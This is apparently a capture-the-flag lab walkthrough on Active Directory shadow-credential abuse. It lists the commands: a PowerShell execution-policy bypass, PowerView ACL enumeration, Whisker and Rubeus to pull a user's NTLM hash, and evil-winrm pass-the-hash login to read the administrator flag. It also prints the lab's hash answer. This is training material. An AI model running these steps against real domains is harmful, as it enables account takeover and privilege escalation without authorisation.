AntarctiCrafts’ technology stack was very specialised. It was primarily focused on cutting-edge climate research rather than prioritising robust cyber security measures.
As the integration of the two infrastructure systems progresses, vulnerabilities begin to surface. While AntarctiCrafts’ team displays remarkable expertise, their small size means they need to emphasise cyber security awareness.
Throughout the room, you’ll see that some users have too many permissions. We addressed most of these instances in the previous audit, but is everything now sorted out from the perspective of the HR user?
Active Directory (AD) is a system mainly used by businesses in Windows environments. It’s a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.
You can think of AD as a digital database containing objects like users, groups, and computers, each with specific attributes and permissions. Ideally, it applies the principle of least privilege and uses a hierarchical approach to managing roles and giving authenticated users access to all non-sensitive data throughout the system. For this reason, assigning permissions to users must be approached cautiously, as it can potentially compromise the entire Active Directory. We’ll delve into this in the upcoming exploitation section.
Microsoft introduced Windows Hello for Business (WHfB) as a modern and secure way to replace conventional password-based authentication. Instead of relying on traditional passwords, WHfB utilises cryptographic keys for user verification. Users on the Active Directory domain can access the AD using a PIN or biometrics connected to a pair of cryptographic keys: public and private. Those keys help to prove the identity of the entity to which they belong. The msDS-KeyCredentialLink
is an attribute used by the Domain Controller to store the public key in WHfB for enrolling a new user device (such as a computer). In short, each user object in the Active Directory database will have its public key stored in this unique attribute.
Use the Below Commands one by one
1. The first command moves to the folder containing all the exploitation tools.
2. The second command will bypass the default policy for arbitrary PowerShell script execution.
3. loads the PowerView script into the memory.
cd Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq “hr” } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
4. After this, you’ll get to know the Vulnerable User — vansprinkles
5. Now Execute the below command
.\Whisker.exe add /target:vansprinkles
6. Now copy the rebeus.exe
command and execute it on the same shell
7. You’ll get the NTLM Hash
Ans: 03E805D8A8C5AA435FB48832DAD620E3
evil-winrm -i THM-MACHINE-IP -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3
cd C:\Users\Administrator\Desktop
dir
to view the files and type flag.txt
to view the flagUse your skills to find the Answer for this Question
If you are unble to find, use the below video to find the answer